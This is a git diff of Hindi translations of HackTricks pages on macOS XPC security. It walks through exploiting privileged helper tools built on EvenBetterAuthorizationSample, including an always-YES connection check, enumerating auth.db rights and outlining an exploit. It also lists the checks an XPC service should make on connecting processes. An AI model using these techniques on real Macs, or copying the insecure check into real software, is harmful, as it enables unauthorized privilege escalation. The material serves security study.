 ### ShouldAcceptNewConnection हमेशा YES

-एक उदाहरण [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample) में पाया जा सकता है। `App/AppDelegate.m` में यह **HelperTool** से **कनेक्ट** करने की कोशिश करता है। और `HelperTool/HelperTool.m` में फंक्शन **`shouldAcceptNewConnection`** पहले बताई गई किसी भी आवश्यकता की **जाँच नहीं करेगा**। यह हमेशा YES लौटाएगा:
+एक उदाहरण [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample) में पाया जा सकता है। `App/AppDelegate.m` में यह **HelperTool** से **कनेक्ट** करने की कोशिश करता है। और `HelperTool/HelperTool.m` में फंक्शन **`shouldAcceptNewConnection`** पहले बताई गई किसी भी आवश्यकता की **जांच नहीं करेगा**। यह हमेशा YES लौटाएगा:
 ```objectivec
 - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection
 // Called by our XPC listener when a new connection comes in.  We configure the connection
@ -37,7 +39,7 @@ newConnection.exportedObject = self;
 return YES;
 }
 ```
-इस जांच को ठीक से कॉन्फ़िगर करने के बारे में अधिक जानकारी के लिए:
+इस जांच को उचित रूप से कॉन्फ़िगर करने के बारे में अधिक जानकारी के लिए:

 {% content-ref url="macos-xpc-connecting-process-check/" %}
 [macos-xpc-connecting-process-check](macos-xpc-connecting-process-check/)
@ -72,7 +74,7 @@ if (self->_authRef) {
 [self.window makeKeyAndOrderFront:self];
 }
 ```
-`setupAuthorizationRights` फ़ंक्शन `Common/Common.m` से एप्लिकेशन के अधिकारों को auth डेटाबेस `/var/db/auth.db` में संग्रहीत करेगा। ध्यान दें कि यह केवल उन अधिकारों को जोड़ेगा जो अभी तक डेटाबेस में नहीं हैं:
+`setupAuthorizationRights` फ़ंक्शन `Common/Common.m` से एप्लिकेशन के अधिकारों को ऑथ डेटाबेस `/var/db/auth.db` में संग्रहीत करेगा। ध्यान दें कि यह केवल उन अधिकारों को जोड़ेगा जो अभी तक डेटाबेस में नहीं हैं:
 ```objectivec
 + (void)setupAuthorizationRights:(AuthorizationRef)authRef
 // See comment in header.
@ -182,15 +184,15 @@ block(authRightName, authRightDefault, authRightDesc);
 }];
 }
 ```
-इसका मतलब है कि इस प्रक्रिया के अंत में, `commandInfo` के अंदर घोषित अनुमतियां `/var/db/auth.db` में संग्रहीत की जाएंगी। ध्यान दें कि वहां आप **प्रत्येक विधि** के लिए जो **प्रमाणीकरण की आवश्यकता होगी**, **अनुमति का नाम** और **`kCommandKeyAuthRightDefault`** मिल सकता है। बाद वाला यह **संकेत करता है कि कौन इस अधिकार को प्राप्त कर सकता है**।
+इसका मतलब है कि इस प्रक्रिया के अंत में, `commandInfo` के अंदर घोषित अनुमतियां `/var/db/auth.db` में संग्रहीत की जाएंगी। ध्यान दें कि वहां आप प्रत्येक विधि के लिए जो **प्रमाणीकरण की आवश्यकता होगी**, **अनुमति का नाम** और **`kCommandKeyAuthRightDefault`** पा सकते हैं। बाद वाला यह **संकेत करता है कि कौन इस अधिकार को प्राप्त कर सकता है**।

-यह दर्शाने के लिए कि कौन एक अधिकार को पहुंच सकता है, विभिन्न स्कोप हैं। उनमें से कुछ [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity\_authorization/lib/AuthorizationDB.h) में परिभाषित हैं (आप [उन सभी को यहां पा सकते हैं](https://www.dssw.co.uk/reference/authorization-rights/)), लेकिन सारांश के रूप में:
+यह दर्शाने के लिए कि कौन एक अधिकार को पहुंच सकता है, विभिन्न स्कोप हैं। उनमें से कुछ [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity\_authorization/lib/AuthorizationDB.h) में परिभाषित किए गए हैं (आप [उन सभी को यहां पा सकते हैं](https://www.dssw.co.uk/reference/authorization-rights/)), लेकिन सारांश के रूप में:

 <table><thead><tr><th width="284.3333333333333">नाम</th><th width="165">मान</th><th>विवरण</th></tr></thead><tbody><tr><td>kAuthorizationRuleClassAllow</td><td>allow</td><td>कोई भी</td></tr><tr><td>kAuthorizationRuleClassDeny</td><td>deny</td><td>कोई नहीं</td></tr><tr><td>kAuthorizationRuleIsAdmin</td><td>is-admin</td><td>वर्तमान उपयोगकर्ता को एक एडमिन होना चाहिए (एडमिन समूह के अंदर)</td></tr><tr><td>kAuthorizationRuleAuthenticateAsSessionUser</td><td>authenticate-session-owner</td><td>उपयोगकर्ता से प्रमाणीकरण के लिए कहें।</td></tr><tr><td>kAuthorizationRuleAuthenticateAsAdmin</td><td>authenticate-admin</td><td>उपयोगकर्ता से प्रमाणीकरण के लिए कहें। उसे एक एडमिन होना चाहिए (एडमिन समूह के अंदर)</td></tr><tr><td>kAuthorizationRightRule</td><td>rule</td><td>नियम निर्दिष्ट करें</td></tr><tr><td>kAuthorizationComment</td><td>comment</td><td>अधिकार पर कुछ अतिरिक्त टिप्पणियां निर्दिष्ट करें</td></tr></tbody></table>

 ### अधिकार सत्यापन

-`HelperTool/HelperTool.m` में फ़ंक्शन **`readLicenseKeyAuthorization`** जांचता है कि क्या कॉलर को **ऐसी विधि को निष्पादित करने के लिए अधिकृत किया गया है** फ़ंक्शन **`checkAuthorization`** को कॉल करके। यह फ़ंक्शन जांचेगा कि कॉलिंग प्रक्रिया द्वारा भेजा गया **authData** का **सही प्रारूप** है और फिर जांचेगा **किसी विशेष विधि को कॉल करने के लिए अधिकार प्राप्त करने के लिए क्या आवश्यक है**। अगर सब कुछ अच्छा होता है तो **प्रतिपादित `error` `nil` होगा**:
+`HelperTool/HelperTool.m` में **`readLicenseKeyAuthorization`** फ़ंक्शन यह जांचता है कि कॉलर को **ऐसी विधि को निष्पादित करने का अधिकार है** फ़ंक्शन **`checkAuthorization`** को कॉल करके। यह फ़ंक्शन जांचेगा कि कॉलिंग प्रक्रिया द्वारा भेजा गया **authData** का **सही प्रारूप है** और फिर यह जांचेगा **किसी विशेष विधि को कॉल करने के लिए अधिकार प्राप्त करने के लिए क्या आवश्यक है**। अगर सब कुछ अच्छा होता है तो **लौटाया गया `error` `nil` होगा**:
 ```objectivec
 - (NSError *)checkAuthorization:(NSData *)authData command:(SEL)command
 {
@ -238,15 +240,21 @@ assert(junk == errAuthorizationSuccess);
 return error;
 }
 ```
+ध्यान दें कि **उस method को कॉल करने के लिए सही अधिकार प्राप्त करने की आवश्यकताओं की जांच करने के लिए** function `authorizationRightForCommand` पहले कमेंट किए गए object **`commandInfo`** की जांच करेगा। फिर, यह **`AuthorizationCopyRights`** को कॉल करेगा ताकि यह जांच सके कि **क्या उसे उस function को कॉल करने के अधिकार हैं** (ध्यान दें कि flags उपयोगकर्ता के साथ इंटरैक्शन की अनुमति देते हैं)।
+
+इस मामले में, function `readLicenseKeyAuthorization` को कॉल करने के लिए `kCommandKeyAuthRightDefault` को `@kAuthorizationRuleClassAllow` के रूप में परिभाषित किया गया है। इसलिए **कोई भी इसे कॉल कर सकता है**।
+
 ### DB जानकारी

-यह उल्लेख किया गया था कि यह जानकारी `/var/db/auth.db` में संग्रहीत होती है। आप सभी संग्रहीत नियमों को इसके साथ सूचीबद्ध कर सकते हैं:
+यह उल्लेख किया गया था कि यह जानकारी `/var/db/auth.db` में संग्रहीत है। आप सभी संग्रहीत नियमों को इसके साथ लिस्ट कर सकते हैं:
 ```sql
 sudo sqlite3 /var/db/auth.db
 SELECT name FROM rules;
 SELECT name FROM rules WHERE name LIKE '%safari%';
 ```
+```markdown
 फिर, आप यह पढ़ सकते हैं कि अधिकार का उपयोग कौन कर सकता है:
+```
 ```bash
 security authorizationdb read com.apple.safaridriver.allow
 ```
@ -260,9 +268,9 @@ security authorizationdb read com.apple.safaridriver.allow
 2. **'allow-root': 'true'**
 * अगर उपयोगकर्ता रूट उपयोगकर्ता के रूप में काम कर रहा है (जिसके पास उन्नत अनुमतियाँ होती हैं), और यह कुंजी `true` पर सेट की गई है, तो रूट उपयोगकर्ता इस अधिकार को आगे के प्रमाणीकरण के बिना प्राप्त कर सकता है। हालांकि, आमतौर पर, रूट उपयोगकर्ता की स्थिति तक पहुँचने के लिए पहले से ही प्रमाणीकरण की आवश्यकता होती है, इसलिए यह अधिकांश उपयोगकर्ताओं के लिए "कोई प्रमाणीकरण नहीं" परिदृश्य नहीं है।
 3. **'session-owner': 'true'**
-* अगर इसे `true` पर सेट किया जाता है, तो सत्र का मालिक (वर्तमान में लॉग-इन किया गया उपयोगकर्ता) स्वचालित रूप से इस अधिकार को प्राप्त कर लेगा। यह अतिरिक्त प्रमाणीकरण को दरकिनार कर सकता है अगर उपयोगकर्ता पहले से ही लॉग-इन है।
+* अगर इसे `true` पर सेट किया जाता है, तो सत्र के मालिक (वर्तमान में लॉग-इन किया गया उपयोगकर्ता) इस अधिकार को स्वतः प्राप्त कर लेगा। यह अतिरिक्त प्रमाणीकरण को दरकिनार कर सकता है अगर उपयोगकर्ता पहले से ही लॉग-इन है।
 4. **'shared': 'true'**
-* यह कुंजी बिना प्रमाणीकरण के अधिकार प्रदान नहीं करती है। इसके बजाय, अगर इसे `true` पर सेट किया जाता है, तो इसका मतलब है कि एक बार अधिकार को प्रमाणीकृत किया जाता है, तो यह कई प्रक्रियाओं के बीच साझा किया जा सकता है बिना प्रत्येक को फिर से प्रमाणीकरण की आवश्यकता के। लेकिन अधिकार की प्रारंभिक अनुदान अभी भी प्रमाणीकरण की आवश्यकता होगी जब तक कि इसे अन्य कुंजियों जैसे `'authenticate-user': 'false'` के साथ संयोजित नहीं किया जाता है।
+* यह कुंजी बिना प्रमाणीकरण के अधिकार प्रदान नहीं करती है। इसके बजाय, अगर इसे `true` पर सेट किया जाता है, तो इसका मतलब है कि एक बार अधिकार को प्रमाणीकृत किया जाता है, तो यह कई प्रक्रियाओं के बीच साझा किया जा सकता है बिना प्रत्येक को फिर से प्रमाणीकृत करने की आवश्यकता के। लेकिन अधिकार की प्रारंभिक अनुमति के लिए अभी भी प्रमाणीकरण की आवश्यकता होगी जब तक कि इसे अन्य कुंजियों जैसे कि `'authenticate-user': 'false'` के साथ संयोजित नहीं किया जाता है।

 आप दिलचस्प अधिकार प्राप्त करने के लिए [**इस स्क्रिप्ट का उपयोग कर सकते हैं**](https://gist.github.com/carlospolop/96ecb9e385a4667b9e40b24e878652f9)।
 ```bash
@ -275,29 +283,29 @@ com-apple-aosnotification-findmymac-remove, com-apple-diskmanagement-reservekek,
 Rights with 'session-owner': 'true':
 authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-session-user, com-apple-safari-allow-apple-events-to-run-javascript, com-apple-safari-allow-javascript-in-smart-search-field, com-apple-safari-allow-unsigned-app-extensions, com-apple-safari-install-ephemeral-extensions, com-apple-safari-show-credit-card-numbers, com-apple-safari-show-passwords, com-apple-icloud-passwordreset, com-apple-icloud-passwordreset, is-session-owner, system-identity-write-self, use-login-window-ui
 ```
-## प्राधिकरण का उलट-पलट
+## ऑथराइजेशन की रिवर्स इंजीनियरिंग

-### जांच करना कि क्या EvenBetterAuthorization का उपयोग हो रहा है
+### जांच करें कि क्या EvenBetterAuthorization का उपयोग हो रहा है

-यदि आपको फ़ंक्शन: **`[HelperTool checkAuthorization:command:]`** मिलता है, तो संभवतः प्रक्रिया पहले उल्लिखित स्कीमा का उपयोग कर रही है:
+यदि आपको फंक्शन: **`[HelperTool checkAuthorization:command:]`** मिलता है, तो संभवतः प्रक्रिया पहले उल्लिखित स्कीमा का उपयोग कर रही है ऑथराइजेशन के लिए:

-<figure><img src="../../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

-यदि यह फ़ंक्शन जैसे `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree` को कॉल कर रहा है, तो यह [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154) का उपयोग कर रहा है।
+यदि यह फंक्शन जैसे `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree` को कॉल कर रहा है, तो यह [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154) का उपयोग कर रहा है।

-**`/var/db/auth.db`** की जांच करें कि क्या यह संभव है कि बिना उपयोगकर्ता की बातचीत के कुछ विशेषाधिकार प्राप्त करने के लिए अनुमति प्राप्त की जा सके।
+**`/var/db/auth.db`** की जांच करें कि क्या यह संभव है कि बिना यूजर इंटरैक्शन के कुछ विशेषाधिकार प्राप्त कार्रवाई को कॉल करने की अनुमति प्राप्त की जा सकती है।

 ### प्रोटोकॉल संचार

 फिर, आपको प्रोटोकॉल स्कीमा को ढूंढना होगा ताकि XPC सेवा के साथ संचार स्थापित किया जा सके।

-फ़ंक्शन **`shouldAcceptNewConnection`** निर्यात किए जा रहे प्रोटोकॉल को इंगित करता है:
+फंक्शन **`shouldAcceptNewConnection`** निर्यात किए जा रहे प्रोटोकॉल को इंगित करता है:

-<figure><img src="../../../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>

 इस मामले में, हमारे पास EvenBetterAuthorizationSample के समान है, [**इस लाइन को देखें**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94).

-प्रयुक्त प्रोटोकॉल का नाम जानकर, इसकी हेडर परिभाषा को **डंप करना संभव है** इसके साथ:
+इस्तेमाल किए जा रहे प्रोटोकॉल का नाम जानकर, इसकी हेडर डेफिनिशन को **डंप किया जा सकता है** इसके साथ:
 ```bash
 class-dump /Library/PrivilegedHelperTools/com.example.HelperTool

@ -311,11 +319,11 @@ class-dump /Library/PrivilegedHelperTools/com.example.HelperTool
@end
 [...]
 ```
-अंत में, हमें सिर्फ **नाम जानने की आवश्यकता है जो Mach Service के लिए प्रदर्शित किया गया है** ताकि हम इसके साथ संचार स्थापित कर सकें। इसे खोजने के कई तरीके हैं:
+अंत में, हमें सिर्फ **नाम जानने की आवश्यकता है जो Mach Service के लिए प्रकट होता है** ताकि हम इसके साथ संवाद स्थापित कर सकें। इसे खोजने के कई तरीके हैं:

 * **`[HelperTool init]`** में जहाँ आप Mach Service का उपयोग होते देख सकते हैं:

-<figure><img src="../../../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>

 * launchd plist में:
 ```xml
@ -335,7 +343,7 @@ cat /Library/LaunchDaemons/com.example.HelperTool.plist
 इस उदाहरण में निर्मित है:

 * प्रोटोकॉल की परिभाषा फंक्शन्स के साथ
-* पहुँच मांगने के लिए एक खाली प्रमाणीकरण
+* एक्सेस मांगने के लिए एक खाली प्रमाणीकरण
 * XPC सेवा से एक कनेक्शन
 * यदि कनेक्शन सफल रहा तो फंक्शन को कॉल करना
 ```objectivec
@ -421,12 +429,14 @@ NSLog(@"Finished!");

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>

-* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में शामिल हों या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग तरकीबें साझा करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
@ -1,39 +1,62 @@
-# macOS XPC कनेक्टिंग प्रक्रिया जांच
+# macOS XPC कनेक्टिंग प्रोसेस चेक

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></a><strong>!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
-* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**।**
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके** अपना योगदान दें।
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.

 </details>

-## XPC कनेक्टिंग प्रक्रिया जांच
+## XPC कनेक्टिंग प्रोसेस चेक

-जब XPC सेवा के लिए एक कनेक्शन स्थापित किया जाता है, सर्वर यह जांचेगा कि कनेक्शन अनुमति दी जाती है या नहीं। ये वे जांचें हैं जो आमतौर पर किए जाते हैं:
+जब XPC सेवा से कनेक्शन स्थापित होता है, सर्वर यह जांचेगा कि कनेक्शन अनुमति है या नहीं। ये आमतौर पर किए जाने वाले चेक हैं:

-1. जांचें कि कनेक्टिंग **प्रक्रिया Apple-साइन्ड** प्रमाणपत्र के साथ है (केवल Apple द्वारा दिया जाता है)।
-* यदि यह **सत्यापित नहीं** होता है, तो हमलावर किसी भी अन्य जांच के साथ मेल खाने के लिए एक **नकली प्रमाणपत्र** बना सकता है।
-2. जांचें कि कनेक्टिंग प्रक्रिया **संगठन के प्रमाणपत्र** के साथ हस्ताक्षरित है (टीम ID सत्यापन)।
-* यदि यह **सत्यापित नहीं** होता है, तो किसी भी डेवलपर प्रमाणपत्र का उपयोग करके Apple के साथ संपर्क स्थापित करने के लिए उपयोग किया जा सकता है।
-3. जांचें कि कनेक्टिंग प्रक्रिया में **एक उचित बंडल ID** है।
-* यदि यह **सत्यापित नहीं** होता है, तो किसी भी उपकरण को उपयोग करने के लिए **एक ही संगठन द्वारा हस्ताक्षरित** टूल का उपयोग किया जा सकता है जो XPC सेवा के साथ संवाद करने के लिए उपयोग किया जा सकता है।
-4. (4 या 5) जांचें कि कनेक्टिंग प्रक्रिया में **उचित सॉफ़्टवेयर संस्करण नंबर** है।
-* यदि यह **सत्यापित नहीं** होता है, तो पुराने, सुरक्षित ग्राहक, प्रक्रिया इंजेक्शन के लिए संक्रमित हो सकते हैं, भले ही अन्य जांचें स्थान पर हों।
-5. (4 या 5) जांचें कि कनेक्टिंग प्रक्रिया में खतरनाक entitlements के बिना हार्डन रनटाइम है (जैसे वे जो विचारशील पुस्तकालयों को लोड करने या DYLD env vars का उपयोग करने की अनुमति देते हैं)
-1. यदि यह **सत्यापित नहीं** होता है, तो ग्राहक कोड इंजेक्शन के प्रति संक्रमित हो सकता है
-6. जांचें कि कनेक्टिंग प्रक्रिया में एक entitlement है जो इसे सेवा से कनेक्ट करने की अनुमति देता है। यह Apple बाइनरी के लिए लागू होता है।
-7. **सत्यापन** कनेक्ट करने वाले **क्लाइंट के ऑडिट टोकन** पर आधारित होना चाहिए, न कि इसकी प्रक्रिया ID (**PID**), क्योंकि पिछले को PID पुनः उपयोग करने के हमलों से बचाता है।
-* डेवलपर्स आमतौर पर ऑडिट टोकन API कॉल का उपयोग नहीं करते हैं क्योंकि यह **निजी** होता है, इसलिए Apple किसी भी समय इसे **बदल सकता है**। इसके अलावा, Mac App Store ऐप्स में निजी API का उपयोग अनुमति नहीं है।
-* **`xpc_dictionary_get_audit_token`** का उपयोग **`xpc_connection_get_audit_token`** के बजाय किया जाना चाहिए, क्योंकि इसका उपयोग विशेष परिस्थितियों में [विकल्पित रूप से संक्रमित हो सकता है](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)।
+1. जांचें कि कनेक्टिंग **प्रोसेस Apple-signed** प्रमाणपत्र के साथ हस्ताक्षरित है (केवल Apple द्वारा दिया गया).
+* यदि यह **सत्यापित नहीं है**, तो हमलावर किसी भी अन्य चेक से मेल खाने के लिए **नकली प्रमाणपत्र** बना सकता है।
+2. जांचें कि कनेक्टिंग प्रोसेस **संगठन के प्रमाणपत्र** के साथ हस्ताक्षरित है, (टीम ID सत्यापन).
+* यदि यह **सत्यापित नहीं है**, तो **किसी भी डेवलपर प्रमाणपत्र** का उपयोग Apple से हस्ताक्षरित करने और सेवा से कनेक्ट करने के लिए किया जा सकता है।
+3. जांचें कि कनेक्टिंग प्रोसेस में **उचित बंडल ID** है।
+* यदि यह **सत्यापित नहीं है**, तो समान संगठन द्वारा हस्ताक्षरित कोई भी टूल XPC सेवा के साथ इंटरैक्ट करने के लिए उपयोग किया जा सकता है।
+4. (4 या 5) जांचें कि कनेक्टिंग प्रोसेस में **उचित सॉफ्टवेयर संस्करण संख्या** है।
+* यदि यह **सत्यापित नहीं है,** तो पुराने, असुरक्षित क्लाइंट्स, प्रोसेस इंजेक्शन के लिए संवेदनशील हो सकते हैं और अन्य चेक्स के होते हुए भी XPC सेवा से कनेक्ट कर सकते हैं।
+5. (4 या 5) जांचें कि कनेक्टिंग प्रोसेस में हार्डन्ड रनटाइम है बिना खतरनाक एंटाइटलमेंट्स के (जैसे कि जो अनियंत्रित लाइब्रेरीज़ लोड करने या DYLD env vars का उपयोग करने की अनुमति देते हैं)
+1. यदि यह **सत्यापित नहीं है,** तो क्लाइंट **कोड इंजेक्शन के लिए संवेदनशील हो सकता है**
+6. जांचें कि कनेक्टिंग प्रोसेस में एक **एंटाइटलमेंट** है जो इसे सेवा से कनेक्ट करने की अनुमति देता है। यह Apple बाइनरीज़ के लिए लागू होता है।
+7. **सत्यापन** को कनेक्टिंग **क्लाइंट के ऑडिट टोकन** पर **आधारित** होना चाहिए **इसके प्रोसेस ID (PID)** के बजाय, क्योंकि पूर्व **PID पुन: उपयोग हमलों** से बचाता है।
+* डेवलपर्स **शायद ही कभी ऑडिट टोकन** API कॉल का उपयोग करते हैं क्योंकि यह **निजी** है, इसलिए Apple कभी भी **बदल** सकता है। इसके अलावा, Mac App Store ऐप्स में निजी API का उपयोग अनुमति नहीं है।
+* यदि **`processIdentifier`** मेथड का उपयोग किया जाता है, तो यह संवेदनशील हो सकता है
+* **`xpc_dictionary_get_audit_token`** का उपयोग **`xpc_connection_get_audit_token`** के बजाय किया जाना चाहिए, क्योंकि नवीनतम भी [कुछ स्थितियों में संवेदनशील हो सकता है](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/).

 ### संचार हमले

-PID पुनः उपयो
+PID पुन: उपयोग हमले के बारे में अधिक जानकारी के लिए देखें:
+
+{% content-ref url="macos-pid-reuse.md" %}
+[macos-pid-reuse.md](macos-pid-reuse.md)
+{% endcontent-ref %}
+
+**`xpc_connection_get_audit_token`** हमले के बारे में अधिक जानकारी के लिए देखें:
+
+{% content-ref url="macos-xpc_connection_get_audit_token-attack.md" %}
+[macos-xpc\_connection\_get\_audit\_token-attack.md](macos-xpc\_connection\_get\_audit\_token-attack.md)
+{% endcontent-ref %}
+
+### Trustcache - डाउनग्रेड हमलों की रोकथाम
+
+Trustcache Apple Silicon मशीनों में पेश की गई एक रक्षात्मक विधि है जो Apple बाइनरीज़ के CDHSAH का एक डेटाबेस संग्रहीत करती है ताकि केवल अनुमति दी गई अपरिवर्तित बाइनरीज़ ही निष्पादित की जा सकें। जो डाउनग्रेड संस्करणों के निष्पादन को रोकता है।
+
+### कोड उदाहरण
+
+सर्वर इस **सत्यापन** को **`shouldAcceptNewConnection`** कहलाने वाले फंक्शन में लागू करेगा।
+
+{% code overflow="wrap" %}
 ```objectivec
 - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {
 //Check connection
@ -42,9 +65,9 @@ return YES;
 ```
 {% endcode %}

-ऑब्जेक्ट NSXPCConnection में एक **निजी** प्रॉपर्टी **`auditToken`** होती है (जो उपयोग की जानी चाहिए लेकिन बदल सकती है) और एक **सार्वजनिक** प्रॉपर्टी **`processIdentifier`** होती है (जिसे उपयोग नहीं करना चाहिए).
+ऑब्जेक्ट NSXPCConnection में एक **निजी** संपत्ति **`auditToken`** (वह जिसका उपयोग किया जाना चाहिए लेकिन बदल सकता है) और एक **सार्वजनिक** संपत्ति **`processIdentifier`** (वह जिसका उपयोग नहीं किया जाना चाहिए) होती है।

-कनेक्टिंग प्रक्रिया को निम्नलिखित तरीके से सत्यापित किया जा सकता है:
+कनेक्टिंग प्रोसेस की पुष्टि कुछ इस प्रकार से की जा सकती है:

 {% code overflow="wrap" %}
 ```objectivec
@ -68,7 +91,7 @@ SecTaskValidateForRequirement(taskRef, (__bridge CFStringRef)(requirementString)
 ```
 {% endcode %}

-यदि एक डेवलपर को यह जांचना नहीं है कि क्लाइंट का संस्करण क्या है, तो उसे कम से कम प्रक्रिया इंजेक्शन के प्रति संवेदनशील नहीं होने की जांच कर सकता है:
